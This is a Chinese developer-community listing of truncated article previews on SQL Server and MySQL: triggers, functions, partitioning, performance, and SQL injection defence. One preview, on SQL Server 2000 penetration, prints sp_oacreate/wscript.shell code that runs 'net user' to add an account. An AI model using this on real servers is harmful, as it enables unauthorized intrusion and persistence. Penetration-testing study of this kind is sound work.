文章 2017-11-15 来自:开发者社区

SQL Server技术问题之触发器优缺点

优点:   1.强化约束:强制复杂业务的规则和要求,能实现比check语句更为复杂的约束。  2.跟踪变化:触发器可以侦测数据库内的操作,从而禁止数据库中未经许可的更新和变化。  3.级联运行:侦测数据库内的操作时,可自动地级联影响整个数据库的各项内容。 4.嵌套调用:触发器可以调用一个或多个存储过程。触发器最多可以嵌套32层。   缺点:    1.可移植...

文章 2017-11-15 来自:开发者社区

SQL Server技术问题之自定义函数优缺点

优点:   可以在SQL语句中调用,直接使用返回值,从而可以形成复杂的SQL应用。 缺点:   能在函数中使用的语句有严格限制: 不支持create、ALTER、drop等DDL(Data Definition Language)命令; insert、delete、update只能用在临时表上; 不支持动态SQL; 不支持“不确定”的函数,比如常用的getdate。不确定函数是指输入参数相同,.....

文章 2017-11-15 来自:开发者社区

PHP SQL 注入攻击的技术实现以及预防办法

最近在折腾 PHP + MYSQL 的编程。了解了一些 PHP SQL 注入攻击的知识,于是写了这篇文章 http://www.xiaohui.com/weekly/20070314.htm,总结一下经验。在我看来,引发 SQL 注入攻击的主要原因,是因为以下两点原因:   1. php 配置文件 php.ini 中的 magic_quotes_g...

文章 2017-11-14 来自:开发者社区

四项技术提高SQL Server性能

有时,为了让应用程序运行得更快,所做的全部工作就是在这里或那里做一些很小调整。但关键在于确定如何进行调整!迟早您会遇到这种情况:应用程序中的 SQL 查询不能按照您想要的方式进行响应。它要么不返回数据,要么耗费的时间长得出奇。如果它降低了企业应用程序的速度,用户必须等待很长时间。用户希望应用程序响应迅速,他们的报告能够在瞬间之内返回分析数据。就我自己而言,如果在Web上冲浪时某个页面要耗费十多秒....

文章 2017-11-12 来自:开发者社区

SQL Server 2000渗透技术研究

使用oacreate以及oamethod来执行命令。 declare @shell int exec sp_oacreate 'wscript.shell',@shell out exec sp_oamethod @shell ,'run',null,'net user simeon simeon /add' exec sp_oamethod @shell ,'run',null,'net lo....

文章 2017-11-12 来自:开发者社区

SQL注入攻击及其防范检测技术研究

SQL注入攻击及其防范检测技术研究 陈小兵 【antian365.com】 摘要:本文简要介绍了SQL注入攻击的原理,SQL注入攻击实现过程,配合网页木马实施网络入侵的方法,给出了SQL注入攻击的检测方法,并在此基础上给出了一种SQL注入攻击的自动防范模型。 关键词:SQL注入攻击 防范检测技术 网页木马 1  SQL注入攻击概述 1.1 &nbs...

文章 2017-11-12 来自:开发者社区

MySql,Sql Server分区技术浅析

一.MySql        MySql在5.1以后的版本中加入了分区技术,其不同于以往的分表技术,之前的分表技术是把一张大的表水平(按照一定的逻辑)分成多张表,比如如果我们的User表中有1000万条数据,那如果放在一张表里面去查询,绝对是坑爹的行为,更别提再去进行增删改。如果在加上索引,撑爆内存是难免的。所以才有了之后的分表技术,比如把用户名是a开头的用...

文章 2017-11-12 来自:开发者社区

将复杂查询写到SQL配置文件--SOD框架的SQL-MAP技术简介

今天看到一片热门的博客, .NET高级工程师面试题之SQL篇 ,要求找出每一个系的最高分,并且按系编号,学生编号升序排列。这个查询比较复杂,也比较典型,自从用了ORM后,很久没有写过SQL语句了,于是我研究了下,自己也写了一个: WITH cte1 as ( select stu.deptID, D.depName, stu.stuid , ...

文章 2017-11-02 来自:开发者社区

秋色园QBlog技术原理解析:性能优化篇:打印页面SQL,全局的SQL语句优化(十三)

文章回顾: 1: 秋色园QBlog技术原理解析:开篇:整体认识(一) --介绍整体文件夹和文件的作用 2: 秋色园QBlog技术原理解析:认识整站处理流程(二) --介绍秋色园业务处理流程 3: 秋色园QBlog技术原理解析:UrlRewrite之无后缀URL原理(三) --介绍如何实现无后缀URL 4: 秋色园QBlog技术原...

文章 2017-09-19 来自:开发者社区

Joomla! v3.7 SQL注入高危漏洞技术分析(CVE-2017-8917)

本文讲的是Joomla! v3.7 SQL注入高危漏洞技术分析(CVE-2017-8917),近日,全球知名内容管理系统Joomla!爆出高危安全漏洞,任何能访问网站的用户都可以发起攻击,窃取用户会话和账号密码。 安全风险:严重 漏洞类型:SQL注入 影响版本:3.7 修复版本:3.7.1 CVE编号:CVE-2017-8917 漏洞描述 com_fields组件出现漏洞,com_fiel...

本页面内关键词为智能算法引擎基于机器学习所生成,如有任何问题,可在页面下方点击"联系我们"与我们沟通。

产品推荐

数据库

分享数据库前沿,解构实战干货,推动数据库技术变革

+关注